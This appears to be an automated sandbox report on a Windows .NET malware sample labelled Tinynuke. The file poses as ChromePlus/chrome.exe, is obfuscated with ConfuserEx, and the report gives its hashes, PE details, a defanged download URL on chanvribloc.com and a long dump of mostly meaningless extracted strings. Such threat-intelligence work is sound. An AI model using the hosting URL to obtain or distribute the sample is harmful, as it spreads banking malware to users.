MalScore
100/100
MalFamily
Tinynuke

dllhost.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 27/67 Related 2476
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 191.50 KB (196096 bytes)
Compile time: 2018-04-24 08:12:01
MD5: 6157b1b75158a6aab48926690638378b
SHA1: 7a13127b7e2d5772a941a0e4789d6f2ea7e40ea4
SHA256: c756c00dc87c29e1e5c9a70dc48ca913d103d0b4335b994a2cd25a1dfed3b9dc
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-04-27 22:36:03
Last submission: 2018-04-27 22:36:03
Filename detected: - dllhost.exe (1)
URL file hosting
hXXp://chanvribloc.com/dllhost.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-04-27 14:00:19 [27/67] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x273f4 160768 940df3006a56a63282aa016273ae29e7 d87a0c7f882c61e3efa7a5fa3653d2591ee3ee71
.rsrc 0x2a000 0x84b0 34304 ab59be4002d66cba09dfb46e2df691a1 d0b04adad22a23333574d4a8308066e7a07be1f7
.reloc 0x34000 0xc 512 7dc9b89d7b602e5dbebe9b9f5beeba43 9a0576474d53199a262766043f845e32e4d84e56
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x2dc48 16936 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x31e70 20 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x32238 628 LANG_ENGLISH SUBLANG_ENGLISH_AUS
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright: Copyright (C) 2009-2011 Maple Studio. All Rights Reserved.
InternalName: chrome_exe
CompanyShortName: Maple Studio
FileVersion: 0.0.0.0
CompanyName: Maple Studio
ProductShortName: ChromePlus
ProductName: ChromePlus
ProductVersion: 0.0.0.0
FileDescription: ChromePlus
Translation: 0x0409 0x04b0
OriginalFilename: chrome.exe
Official Build: 0
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
KERNEL32.dll
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
System.Reflection.Assembly
W9pxW9dwJLXbstbE0cwmfQLUFINDopgwn
0C0904E4
VarFileInfo
WNeMFSu7llkGvZU1L29KRwjFJ3sP2ITY9nDO
chrome_exe
Comments
kfyh2TKJgFADHuD1lb4FjEktLCIpw
zCbHMFsZ57V3q9bgqCEjmnq
parameters
Maple Studio
InternalName
Invoke
qLQlhomg9alukQceJxQOnoYQIzXN
LegalCopyright
GF131YLqIbYTbaV4J7dF9QDYfmXOHz
Copyright (C) 2009-2011 Maple Studio. All Rights Reserved.
1.0.0.0
BZqjBaqxiY0kypEDTxv2l
v4J7QMaOFrZhLcURcCv6gq6HyqQ8ELJL408k
M5kMAKkw77MV0NOCwbq9
StringFileInfo
Translation
LegalTrademarks
G827WKpOnf20nJY2RSuoKlrdqw29qC
Official Build
ChromePlus
qUb7P79MHCkVg7ClgATDZvc1eDs
CompanyShortName
FileVersion
chrome.exe
VS_VERSION_INFO
System.Reflection.MethodInfo
040904b0
SKpKUf1wECPeCZ7FudpvVFLywX5
WUmZh3Hka0yaNIunIdMtZbpki94OPFI7Pinm2y
FileDescription
0.0.0.0
OriginalFilename
MJnrVETT20Arclrz9I5T1
Load
obj
BDYBuUDejWvTss5ntbinh9uLUy
CompanyName
UEKWwUT3NsptAy98wewOP4yOfqi
ProductShortName
ProductName
VKC5nDx5FQhuHbnXO3pS8eRvsM6gIu7
bSJcdmoMYdRkuIKqEqIrRGJ
sm4w4GrwWluRtKLkXSc8qFmmsz4vVx2vhY
ProductVersion
E(L-
bayG
`'~F<u
I#@5
DateTime
I&XX
qICZ$
ISa8%
cLh
F-<[
HBVm
y{IM
yEJTP
'#l"
[&A
ConfusedByAttribute
f\M+M
f]yet(
TI+l
u")&
I'I
?n|
Tdid
L}R
K>rO
vF@G
vQ;k
fslW@
y-4:
, VLm
3",C
?\6hT
;j(6
)Z ce
HP#
|<\
U`r*
=b._
.Ei"
bdLu
/-zx
)Vvb
J=l$
[T'SYw
!7==
qTSmu
g.-P*
.JBl
\bX=
|9FdK
x~LVIo
e+(hV
^/ "
` 2Wx
G?:9
gi\2[pj
z]3I
rG;T*5.
v>L4
(IWUu
P n +
849YU
Q+S6*[
u~$S
| V$
6?OE
BSyX
3`6p
~Q~,
(d>mSn
6^c^
[)8/
'[ow
|Za83
3Fva
}JWc+
{s15Upv
MUQ?
rp9J
Vedue
Xw$tM
P~vQa#w6}V
| \w
AqJ`O
mQs:
op_Explicit
m$A5
System.Security
hc^f
.zGD'
,\e!
1q;.
JB2M>
N-{f
_/ES
q,UO
0rv}
)88#
\(l9m
\b|b
cwvy <S
."h|
as{l
r'3a8}
T*:
Pk,&
[}T:8
X&vYV:2T
S{Bb
^U%p
^i lnN
nB$A
0=i|
7}"N
&t3d+I
5pYN
?;+V
=Sd`
*#'>
z2P9
>{XW
yGh
9Hek
RCtK
\(>'{
?l[e
3@A#:{
L\#~
I*{F\(
U3br
Tc*D
J9/8 Lr
)rc>
<_.g
-3O<%
9ic(
S({ E
n)CXvO5
[U0p
N.>d_
U@VN
Qle`
r'hv]
S^Vb
6fx
={t!
v2.0.50727
*~/(
mzn'
d# N
2J~V
mP5LC
fLK8
4&5e
Ei4Yp
t|(#
kkZ1n
^Jd3
DWR
IkFT
@&%H4
.j
=I'u>
P$x(
_%R
taw~]
< .d i
w>G-
G827WKpOnf20nJY2RSuoKlrdqw29qC.resources
7%kj
u 5y
-7(h4
UnverifiableCodeAttribute
FvS@
.PNy
)^>W
`\pJ
{#:A
vZ%,
J3q5
J+AH
x^t.$>
4`Lp
[i`a8b
#Blob
dR:3~
9t3a%
}T.-g@
;hE? u
DcdO
lL|P
1J?c
UEKWwUT3NsptAy98wewOP4yOfqi
xwA?/
.xcM
*P9Q
sdc
'R|1+
~n#j1
:|qF
op_GreaterThan
Type
?sX2
tq694r
xLG.z
tVf\
[Nrpo?
KRck~
5M$O3 Gq{pH<
6~@8
<Hi3
[q:O
+K 1
gp z[
raB{
=[A@
Km8]
a'mv
%@o
6#o\U
rm|>
ISKp
-p]G
dHB>
Bw.QE
nRS`
WBG5
/HDm
k%Uf
z!0A
dRlCK
LateGet
/N=I
1O}="L
5)9K
4nl
*Lb^
wb>q `
+,]V
C x
YwRRyg3
OO.U%2
xCZ
tQXkM
get_FullyQualifiedName
'!( 0
M2B8
rW|_{s
=b?-M
c?o[
LZY5O
{L?lm0
%rmI
%6 9
LateBinding
:kw?(
IOVi
0YAr
x;?h
z~W5A
1 .n[
HkdUj
7Y`s
@\:gN
Vg} |%
DialogResult
ww8|
Lr'B ?q
r){*w
<{5 ;6|
492~=zc
lC4/rY
.text
List`1
&G1c
GetObject
G :N
L?d>S
Y Jq0
7M a
T!?'%
*7kj
EIhh
][rsU
KDmF
qtz5Q/>x
rjF
:jY2
4k@3Z
^6 <
c"E~
{S~C
<E_FlD
MZrR56l|
<86b
Bf\[`
ID^'
8u(U
}w0:
scKD
SkipVerification
!lO(^
, `V
Z N!)|a8
|:=UH
i^Sp
ZX~t
jnhI
Ti"uh
:nSs
5!|@|
B*/7
{(FY4B
:sbAF
9 nt
QtwAl
VS C
r}gg1F
r6hr
"Xqkk
_)fV\
1dKI {
P]td
0+A.
S yo
1jO@D
RU [&
y<EK-
?tH7:
njri
+_,m6
yE|
:De=
>*tt
`.rsrc
wNwJ
LV:y
Me8q[
s`^/k
/;1<
vo5FlU;{S
}>~.
CEusG
LD|A
kernel32.dll
8fs_mPo@
nmU
oom
"hzA
^+\^
Q#RH
|e]Z3
oub;
g #
m3b]
L-5X
B,
w=QXc
_I,L
I,>tN
q7X}
!+Wn+
UKp?wx
/gpC
9J^^W
'ZQh
Z {9,
, E:
FY6
e"Yv
_0{e7D
)Y)m
6huQ%
1lZ
129Xf>
b U43
79hOp
OdcYuh
=0'
Marshal
H )A
j4,/
lVDm
Ji!YB%4
|Ya@U
E 2(,
[Q@JQ
SOBLJ
`,Jl:
?),V?n
C_X5$
ZjxH
-s{Ct
1ZJ"
, Eh
MO{m
0bf i
.VmH
aa8P
y 9R
z@[CS<
iSx"}yJ
8 T])P>
_gnQ
10 k
. "Cw
G^Rv
%&8k
`~K0
*qP{
PzzVf
Ufl?
%&8|
45ka
}Cvl
6oJ<c
iNm>{V
xzoU
H/5/
|%0xc
jXP Z
r2uP
%&8N
%&8H
get_Assembly
c#0\O $Az
`
j/V\N
I}\}
I 03
%&8W
}).e
^tH<
0%2<
:Tx e
{VjYE
VuL2
%&8"
%&8<
b9k
/%_ :.
G?5j
E.-q
N~ :
/HP b
-ZRp
wej;o
*[U
%&8
8
huM`9
jY&W
i2(.iwA
get_Now
Z S
i'N6X
T hY
- |
0%2~
v Z h
x[vH
;(,t
:>8
[6K3
b=F]
)U;7
D"dvlY~N
eQ$|
+Q`[g
A`J+
gSt0
WNWa+
XItf
gavv
L7Mj
>Z 2
op[}
QOLl
@j;kk
FT2b j
jiEWdk
)vXi
\aPl0
/W9w
d8@oC
J[5^M
kfyh2TKJgFADHuD1lb4FjEktLCIpw
P4 ~v
3EdJ
q7z('6
X\S/I
#I`$E
C7~w$k
~lC>
/vw|
PO.C
dm[>X
WC2C!8f
RFZY
0z&+i
n?T"
Ll^tv
j5n+
<@ynyQHf=&3_
M`:
jVII
S5Uwtw,
&wd\
:s)\1.
rMCQ
+q=Fpz
4+fHB=V
$3:zY
Umr:
;@=}
/+LX>
#YLg
:au6
r}|+Gy
<b`e
Z}R
D,7J
?5sc2
U-Uyf
\wDbk3
l],~
My B35
=GYA
#Strings
oE{
=~qMcI
J!zwf$
Lk3v
~eb
, *:
HDwB
<u3iZ
@e~I
dKq~
%pT"w_QY*
n3m)
p,in
#Dc]n
O cNC
ht?W
UJp
P\3i
)O;N#
b$%
/=SB
vi S
I)k+
H[)=
J<<h
3Z '7
Kf{J,
(Y{a8$
w-m6
_D*am
~jj;
eP%@f
`39w
h2."
get_EntryPoint
x]=k
usz5Hc
FL J
System
K{BY
s$' 6
<h&?
Cd9Nd
)jA2
\zDG
GetType
%qe+
# M
#'V
zzYj
TZ,,i(g>
`AN@
yuWX<
yCoD
Gba8H
XZa8`
W^.:
JEoi
LAC>s
DPn6
Nx|{
8.LS8
_<a+
@CD`T 4u}--.
v`{v)
R%E}
|pSm
Pu;m
LF;8g:Q@2
nt:;
P30-
$Da+ O
||A,
d= ~
?$wW?
[p8l
jU) c
I <H+X`
MrPW
String
[Npi
12x
<6h#
H@ N
RR3&[k
^:"n
System.Collections.Generic
NV 2
oZTO(-
[0 v6~
_ttI
/Ua?
s RG
t BB
&3".
&kWW.6yd3R
{/Viu
LJBP
J$*F
;*\w
U_&XB
< %V
;*\x
e;N5
y~@t6
QB^$
,"z)
su&K
i}-C
70jA"2
pXJy
;Wlh
Fw *
fJt$
a}RQ
|5Bgf
F '#
h{8Y
C@gJa
8j;l
6!GN
cx8GV
wlb\G
tCi0
7#D1O
X29q
t&:
CCAb
q%d+
KE"@YL
R HT
sB5K`
s$krf
qR&8
@]WZPK
r?Q`
.AL) Z
WC!2'
yn;W
~ ()I
d/{<
M{,bg]
2/.2
V:2%8
*i,0Y
qUb7P79MHCkVg7ClgATDZvc1eDs
=J){S"X
u4,H
l;y$>xj
iB_A
a kd
Hh3,>xn
WR1@z
>YJ@
5h%R,QJ
iGq
i?l?-
$qw_
c-];\
*HV_E
e^O[
J }L
IeL)
',<q
BN}
I16Z _b
X?Jl
QIS]]
sI 6
`MwS
@/<1XP
pV>/
ParamArrayAttribute
%ZxB
GtD
MHWK
j7N|
ERgR
BQ,^
Y#O~>A
}!L|
iue0A
<va
9tP}
*"2/1
zO6"H2D4
ubDzu@Q
%GW\[
Tr{Y
*9Ia
s |?
d+Jle
}!3n
dxQ
=p=
bs#P
{dQ D
)ok
38srS
j PO
s8sl
Z c]
Q<@g
F?Ptq
Z~Ak
nM<K>
k2^L%!
#P3T
kM'=
ND|U
vO/IUa
x Di
[6QT
q_.
Q` $
.uw
?$sWu
nF3'[h
mK1g\
%-x 24h
*m v'
*/
nlLV&B
6g]
`zQM.2
x ka
8kWj
`@{/
?I5f.
{eHf
qW>P
58o@
vr-,x
)3Qd:
ntdlT
N<7
_Tlt
`Dut(!
j `s
|.k?h
X I
? #2
{l\N
alEP
+fo'
2yx*u
6ya%
l"n
yq;L
UInt32
>a;6
+ }9
:Uvc-
#hWu
U8QX
W/Th
ToString
gT$^
f G]
DA=e
6 z,
yS7Z:m\
-e 8E
bTZ_
7ei9F
7kTx
hCH#
*+ P
VirtualProtect
N NT
Kl|}
PerH
CIJ
^{:wkh
vl=Zl
ICryptoTransform
'x0H
1 @~
Q@j\0
n*e0
XfR
+|Og
Cb/e~
!W>w{
L<(1
fN=B
&EaX
o4h/
f0*{^
}6D;
9y[ B
Ogu8
I0 S
3Y?
.f"e
System.Security.Cryptography
c2Ji
@"$|!V
=iVu
Pr>,
j7`#
DO!jt
"vk_
z6zrI
a_\]d
>6K$
AGI]
jvkA
VIQK
KfJy
.*`5
A"'he.
>q^}UA
&KPI
mq7Kl+
"?a8
`ta8
o0S`g
cb f
_1\7r
#j#B`{4$
<1:H
mqo
X-7`s
"Hi/R_
grr[it
j'9M
_33gAH
9jCF5
!h@mL
\J-:1&
uQ_P.M
"7mr
$DS18
I6'
.ctor
[aF
09e?Y
d0{=
B[u*T
SK "
.`e.
AO3
mscoree.dll
]i`+.
ysXq
}b`T
sE
<?X|
)ZV>s
INbO
$WNeMFSu7llkGvZU1L29KRwjFJ3sP2ITY9nDO
gm10
,nYhjGv
(qM`
k !l
v1E'p3
<cr
|9k[
~&5%+
z{Pi+
"CL*
2C8
+g,Q
GetTypeFromHandle
T3 5zJ
xpoL@P
0]A 3
]B`G
4O=Y
kFh[
t=BN
hgox
4 b\N
Module
$Bm
WrapNonExceptionThrows
nMOXA3
NY'.
MJ0b
%r >?
U W/A
*9'6V(
@.reloc
T2H~~5
s0`gPD
W$@6
5/Lp
E&uK
C5 H%
qWuY>
"ZG3
NW"0Y
9M$4
Le-}
zodf
Byte
.jP
57mj
1.^
<,b>'1
s)<
N =&}P
7$2^Y1
s;T@
.{+{
vWZ Q
@US7S
9z\=
.j(C
GtQb;
:Xe7
j65$
:t>He
XsNP
5;)~!:
[`!9
DpQy
tNTu
u/ Bj
fC/F%
L$N
fVK
_^J2
e`Ps
C;4c
V @s
:TZKH
"sJLw
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PAP
tkw"
r+=O$
pl^sM
lpx6
MessageBox
=*:4m
DJlL
@"W"
IE<N
FOO6
G,n
PnU;
As4q
(tFy
Ep5|
Ri$2
8a8L
d3pg
8hb
KQ H =
eZ za
%j>#
wus1
+j0a.
C4>
Zi h
(4Fe
;7P)A
Xz]
x r yK
Z2u-C<
RuntimeCompatibilityAttribute
PKrWs(
y$n[
, ;X
OnN
2F+u
yq{" G!<[
7uGv"CS
Assembly
%[s`D
!38'_
z/v,t
~M.
Microsoft.VisualBasic.CompilerServices
"]SY
YT)%
ConfuserEx v1.0.0
J4^ -Kn
BKG#
}pxJ
@82A
yl(?
|x5&
.cx.
K0S0
QJy*
T Auic'a
"66
H.O=P
oZ53
R5+
tvcz
1m%j
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
, QM
Za8#
^3nG
, ;>
Z'C')
fjg
jtp
f["G
6)B$
62(Z>
5h U
,6_
[MBS
<]2?
b;=Y
yJyo
F]MH
]&~-
#XGR
N@D#Q
-N/1)7
mbd[
/u:s
OYz2
q+gulQx
#a;N
G= A
,X:CA
r5pk
D39`
Nc 2#
`Y@"
LhAE-R
l*|^
HcaK
" +/
]tNt
c|Hi
?[U:
, f=DuZ
?<`q@ /DvF
)tQ
, d2i
i>K qnG
?k*!
!=j
9AJI
D73"
I6A&
&>E6wSh;J
8:'R
`9/6-
szB9D
D,uR(
:#rK
4SLV
WV/4
{SxJF
x|Y^
(ORX
dkrJ
ZI|k?
\k|C
;\Kh
):lD
(4bB
Y!{I5
Q(GvPA
5nF1
ResourceManager
Show
$Qt
:: >
. #K
c+$
OH0
Za8M
get_Chars
!WMTVb
bXKX
x;Y5
:<E_D
$W
;&ob
Yym)
Aw7/.
.$Qc0
-:OA
'A<
h=E*
KM.1.3k+-
(&[5
b: 4
> /@
*3<P<
sS;P
i@f7P
aSrf
QXe
q ZW
i:a,S
~0e
m:s_
#h8,
bsLB
Z+(;
1V.F_=
t]b7J
\`m`$
<rO
L!x[
S@uod
.;Z
&{ESN|
EVZ
k' 7
ZE)c%
FnZVC
^-{M
d%#{
A^r!
%`vu
dSrs9
, FVT
5N+8
YC z
4z $
B pW
, E5
!D ` y+$
R9y>
m*sQ
@u*4q]
GAvV
n}]A3
+(m
r":c
OgI\
F5%+
jC(m5
0D1A
0TN (H
o@qp
08g H
7<I}
yEMm.
32qR
&i/R
~7ZQ
vkK06)
gArc1
+"I'
BSJB
vg \
/m-=
LyCY
>KA T
Y O*l
GF131YLqIbYTbaV4J7dF9QDYfmXOHz
Ma `
1veW
Z&c,
eN$ 7
Qy14
pJ|6_:
Z sp"
`lY?
ba9K
,$a
5\VV
Y$_"
^x~
, 4X
OSs
^APAZJ
lU 4
fu``
Em\
&>v]
AddRange
m]w*
+M |
#R*f
JL/iW
?3]
W\v>
\DQeY
7H <*
zCbHMFsZ57V3q9bgqCEjmnq
PF?
,Ai-
_fR3
#{&T
Ur6G
lW.Z:
5 [ F
.cctor
I!ur
$%&8t
O\ /w
^0sN
i>yV
mscorlib
Ii{jp
/<3W
\ZGB,[
gKVy
OC +
Vx/B:
Tb1;
K>u|
8':O{
zo-P
FH@f
R ]
#LJe
M3HpU
B1OhQ
H0_7
F% S
"XGR
/(7'TcY
hi_)
w Pn
p]"x
O(Kt
j,LI6
UGn !
B
92+:yo
m$T>
BQc%
Cq%:
q~5
YS`>\lEF_H$"wV]
>E$/
s\E~
System.Reflection
6~N-
P Ii 2
J.T\\
,D
>#Fk
RuntimeTypeHandle
k">?
?PTB
/'P
2s$$B"M
==/Q
a[ct
/"vf
w'{k
POl.
Ne ?
',-9
<5y1
z4wO
K'P%
0#sx<`
System.Runtime.CompilerServices
Nvdl
upM\(
-"L.+
rZ v
]FpM
I>"a
_X R
j3,
eZa8
c.RP
<Yh)g
Gr^3B
Q}rqv
J! Ee;s
\CplB=
w2cn!
<rtG
G&5
.NjN
&G+c
c)0==
w A0B?
M5kMAKkw77MV0NOCwbq9
X?w,
E3X
R#n{
:@;G
7vQ
s6/q
a>=m
3DKN
Td\kW/T>?
*x6
9-m
qLQlhomg9alukQceJxQOnoYQIzXN
Ojg-M
<o r
M+j{
P0Mzc]
Xzt2w
+8M'
&} c
vJ s'
hX{k<
J}iY
O#]?
+2aM
, 'BvSZ :
nEvz0^D
%*Lg
;uC
`KwP
{F0C
D j
AA/
,IACQ
J5=y
oV7}
Rp{
US~z
Nor
:<jF
ZvhS
&,pc
/^ |
Ppm7}
get_Message
!This program cannot be run in DOS mode. $
Z0>s
NEY9
J!},e
EQ" .
Vo h
T7 J
S0Vq
(_ *
5(-!@
x4"'Q
kO3R*
!F^wcA
8za8^
|v7y
7HX25f
c Xd
u<h8M
tLuT
7!V\ E
De+r!
TS i_9
J+Nd'
uO](
Ijf_)
#GUID
68R/q3
PEuaA!"
[ '(
(_ @
@a8
{m0ac
Wn}'k2
s]T'
J;0%j
S Nz
aoBi)g
Z,<S\
]p@:eW
7?7{
kgX#
~'>e
0BjN
D h&
'X]/
\Q'
5{U]i{!
a#DK<
P!D
4^Z w
KApD
9sS.:&
F&?U
n-M$WpF
?%&3
0: 9o/
~$7
.SYy
hwH&
@Ses
dP uF
6XhZ
y`6]
}v2^?
n>Gu
IntPtr
nmz(Q>
>@ue
:/)i
}$?"
^m,%
AnB
_h"0
!NiK
Cz1z
r2s^
9^AF
o 5bX
WVMRM
1l {
^MDr4W
?24]"
M!T|
YD4b
/i3v
A,SM3
#RP8
*u<o
NZ +wB a8j
XxbU
E|uq4M
53m
RijndaelManaged
Z Opvca86
kAw T
G8~kg
^CE1r
RY U
JkF .d0_:U
)h'.
Z U+
4\w
axQ0
z"sw
R,`C#
%i8;
=7Qt
bOzB
ZxAl
cCMP
bK2
_D1Y j
,g {
N ]S@]
7ba8
dL"#
) 4J
N5CWV 7)
iSo0
, iy
btvA>
9M]u
euu?
' lI
pZ N'Wba8
7,Y
*[,o
_QAE(
h* ~
\`B
m8?^'N@7
,)yL \
W*`\
0W^L
YT~X9
F ~*
J@$
M7Xa8
n[\.-=
/|3X\w~
GD&y
i!Q v
Z`E@J
A1KDr
/) s
X~)7
>DpdE
]: '
+Wa8a
MethodInfo
X l.dlT
a*>.
;`fBR
C`{
CompilationRelaxationsAttribute
Dqa8Z
QZ g
D/5Ia
[e
]c}'
9l?2WZ
e7O2v
\;8y~
wV||7
E$R1
wq|wv@b
a*kVC
']R[
DzZ p
jo]_
P(M~~
Ht'G
EO;&
B ;a[
CE39
:Sf8W7
n" =
h0@r
%/vf
deU&`
`ee9
Bp)n
Z L
M2s.
?,|U2(L
S{8d
9+r>d~
lDY=
p 8(H
WUNB
tOr<]%
3m_2
" VH
XGR
Microsoft.VisualBasic
cF4i
K8v]w
P_ug
F8C=H
u=5
xcO[
CzJe
,8S+
'0Y s
yx6lQT
ipvu|J
rL9 Te
*)TVY
VKC5nDx5FQhuHbnXO3pS8eRvsM6gIu7
/{9m
X ntinT
k_n38pS7+=
u8s^
%Zf#
W~Yr
Fa8t
f4jz
FFK:
h*4}(
9 FA
^wS#
uI Ju
-`"y_k
U<1B
<)d~z[
` @vU
}-10
+3A%]
\Z d
5aCdi
&O`C
}kFD
[oQC
zAP>;GU
StringBuilder
w3>:
Append
&n.9
4 y!
+.?L^
>F)
k=!
ud!i
5~Rw
Q Z,-
-I)$
02H7n
iA<]5n:
| 'nQ
xUCi
f2Cz
(&ff
}@10^a
>Tnb
hE\2 7
{ Sk
&VRT
>n4&Rl
/f\=
K&9d
)>z}
hx7
6:bS
4^y
va'a
BZqjBaqxiY0kypEDTxv2l
9;eO
nhV-
Copy
qH^sc
tC&HP
:l,6^
_r)O$
q;"C
MR'kOBn^
JAww
Y)eB
Ly3tVU:2~
%L*/$
SD#b
7wjb:
System.Resources
m[>=ZR
U,JZ>
=?Ph
D'}
X ue
U=Z`Q
q]EF
z"5'
BZQ]
2ah2Wi
b-`]
AN,~
#1d'
D*ZEwn
%z-
X90F
;E\v
, 7{
LyrW
UM)x
xr+ j
8|B7.
?6D9
Gwr+
GS*b
Tj}.
b&L9
K5 =
H_E#7
J p
z/Dr
\?8)LROm
Cg;q
S S-c
&WUmZh3Hka0yaNIunIdMtZbpki94OPFI7Pinm2y
cyyi
K{Ij
::ds
uS(bzO#
\=X
S 5M F
,g!R
,1EE
b&>/
N=(xb@
bkk "
G)4'
?8- b%
][ra*
+fIY
_CorExeMain
!w$9
"U9m
2<,I
- Y<
set_Key
Tsx2fUA
L _>U9
++7}
VV l
l=W
% M1
~n<Y
Ia8Y
P-dp`&B
gs )
4@|R
~6\
KV[
$5!::R
^t~e
Oc)f
J~eK
ToArray
StC1 yB
Po8zn]
]"$q
~"G,
@(J[
+cj+
tkVS
'T+N
eo q
K.CdQ
wUE~
'UU=
mK(G
T.}H
v!c5U
<^tl
"GWb
okkc<
I22Nj:
@,"p
MkJC
}r06
#F+'
{\ c
o+{
axA(
"4)
.u8-
{Hsd
Attribute
dy~m
}Gsa_~,
7zw!%
cZt+
f!O\
%`2\U [F&
NXAT
\7cQj
y0;y
V=>1)
<Vr}
"k, |q
tXe%~"
zZa8
me`-b
vmB'*
v!%
6Py'
Ya*c
G#STV
/Zn"
K8+Ob
Ud/P
e_"%D!
aK)Gm
fV;4
xaa8z
FeFu
=Mae
, y4
yga89
;IO;wm<
BTjI
bcL=G
dlA&
!<zG
fT1$
@!kv
0:[G
ss:O$
, a=#
V^RR~}!
PK~GVFI
oyf\
N35W
I a8
IIE#
1W:!
fuG{
#}_'
zEh^a
Da=pKg
^E
^ ?IP9\
)G5#
5uQ
&X `floYI
EN30 h
Object
`f;P
k>WI
nqW9[^
_APP)
Rdaz
W8I>
?Cf
|YF9J-
nhLq$
t=2x
ANZc
`5W-
:w~
YUe)8+Mw
SA`D
qm=/O
E c1
[.cLGU
LZb=9aa
s4Z r
0|:/ Z
BDYBuUDejWvTss5ntbinh9uLUy
#~@,
M3k6
NKZT
HdXG
F$W&
^}mNR8
c*nd
0ia|sy
#<`V2
B22D
"h.e
?Y"}
0<)U
:(2x
Z Z]]
j> F
o'di
I9"l
CK0 k
2 Jx
B-QZ
spL_
l/ )
#r Z
_.KSz
(6yZy
g6?q
?~mr?0
wa`[
MJnrVETT20Arclrz9I5T1
PV d
Wes,
6c B!
X e- |
S(ux
/>#^
>![%
ECc,
D)&a
xDa8@
%Ktd@
J4aV
w&Ds
?2~P
^/>s
oX`G
Dc7H
B=5"
xR:
Q`a8
hqZ?
+n, Z
JNbO
>$.V%
=} x#e
EMco
HYO X3*
;2<
(C^@&I
d}o]
5AN|
T!=l
7DN
tUOd
C|Pt
u ;H*,O%#
j8_Tu
wn6m
C!>;
RW-[
w{s{s
uI"
w0S|
KX D
B':Do
x'&Xg
4NEW
qhb*
c&]F
lPI
2; C
OHbE~
R<M_
rSNb
U:J:
P94b
5%!mk
o4MY
W ar
G0` B]
b7h+
#'^M
|auY
T]
&gQI
6;j,
XGR
+vF{
e} b
B7wR
Mr }>U{$U
@p;SR
!$Bd
lS M
qg"6H:T
ak}kz
8.'%
S 2Tq8
4oD.
a8@v
Z h
[&,[
Zl+n
O/`8
=dA=
`*3T
F?!j
GetHINSTANCE
' )f
ouoW
XSa8[
9dOK
, zi
0A^/V<
:1 e
CP@jW
rZZ
4/tt
MRfQ
}edhF^
laI`
Hj&B
}j/5
+]2m
| p \
gGn
QJ J
b3i^=
;{~6
2XJ
_ Mf
9)-v
wvMG'P
~IU#*
3ml(
GXS}/
Rty is-l
=w8'
eZyz
6gv;
dE|K
a8R
ulh>
#T-g
NH+
p`OZc
AFN2
"PM>
fAcuS h(
2uA@
WBU:
?^d#K
%"SV
\?Gj(
a9,(
\au
:9hO
G^b)~h!#
Z`z[
hC,@
<b{y
#Schema
eC uk
NZMK
JO-C
t]dZ
Qa8
76 k
k'SA
AddMilliseconds
f[KZg~
W3{q
!p;F<
, 1.
<[`vh
Iq \
#H'D
iJZ=
x G
L $/
CreateDecryptor
@dK&,/
-$]9Qd
OwA5
KA-}
a8Y
#:|k
B/I
fR 8Sl
wYU
} J\
.Z]x
Bvr`@QG
Exception
C#;7yp
n;A4
}EK[
0]5{
: tVo
nPn/
5Sl>
SKpKUf1wECPeCZ7FudpvVFLywX5
34 o
z9a8
<trn8
{1qN
p i`K
NtCoT
/mJrB
mb8'
, #N
=Tcj
T`"
)r8A
J6'w
ag]{-
p 8O
sB!-
`%Kr
N@~%V
FF*s|6
H\gX;T
"QX)
SymmetricAlgorithm
(T7H
`Z w
=]-=83
t/h=
27 R
w0-8@
%R`$V#@
&jb\Z
}~XO
D3lr
j &Yg
+U_#CI
hm=X
f1Z!
YA R"
/&.5
&~;r
Ua$1sOA
-r8
p}x
,:'6T
{A6r<
, -x
*8$b
r8!Scr
ne*s
System.Runtime.InteropServices
s;w"2
:' )kb
MOJu1
w?8wtx
RX%n
PTd^281
gW! Dw
& TN
#+Gh@Z(c'
g7}F
s<%_']b
'x3n 7`
-X+e
_$ :
AZ'xS
C &
P98nD
6*<3
6*+=O
c<C9PD
5e#
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
'-\VuH-{
moLbM
Q^b7{
Qwta*"
OYTqw_
EOH
t :=
{R!U
afx_!
{31>D
k<Cwa?
0>={
MhBf
<vq}
U8 -B
'!W&
O"`n+r
O5xR
MMr`!
TransformFinalBlock
5Pli
mu.^
D$1j
V(#
System.Windows.Forms
!W9pxW9dwJLXbstbE0cwmfQLUFINDopgwn
ZBB2
;97XL
t</
) M,u
PnR/IV
w:J8
>i,#
Wx`]
OvQ$7
$ FW
, {b
5htI
V4R1
XYG![
=RjS
#Hy&@
sO _
w)v?f
qc_<
-7ePh
3P)'Cq
1JKN
zR~Kw
u/$5
!M4m
)2>|
Z>#B
Ukt<
dNFybP#
ZY@m
Eoz-
Y-A7
v<[{\
<hXY
Qcp8
k*RB
UG<;
GRw&A
:Za8n
23h]
ro"O
LS :*
l^bW
2X%M
NKN_
Zs0
_1H%&
=XwL
uG4IU
t~pb
<Qh#
A{fZ
z/?L
kcd?
.YjC
x(RM
"UP?)
k111
P9$q
IC+'
!wCr
Rc I
$ff~
"AExh
* Z
*kA
bz.7
5D}}XA
Fr7a
[= }
i]>D
$Jzp s
, j{`E
9*|@
1-AN
4j4;
'_a8T
dZJ<
zz d
hO+f
3k`*
@XGNP5=2
c"J/qd
~%N+
@ENs
cdzN
:Zpl
x F7(
I#*x ^e
p!|F~"
Mw[o\~
A xJ
A+\}H
'$]p
5 _R
]#y/
Fx U
]qSYc
L<\>96
xd Z
s.U'u
gK;P
tSPS
5?;4
!ct:
{@`8
Jc,|
lnp)
EM_?
G'~
&,-W
svN:
g`69\$!
H#>W
U.W
System.Text
/%B"
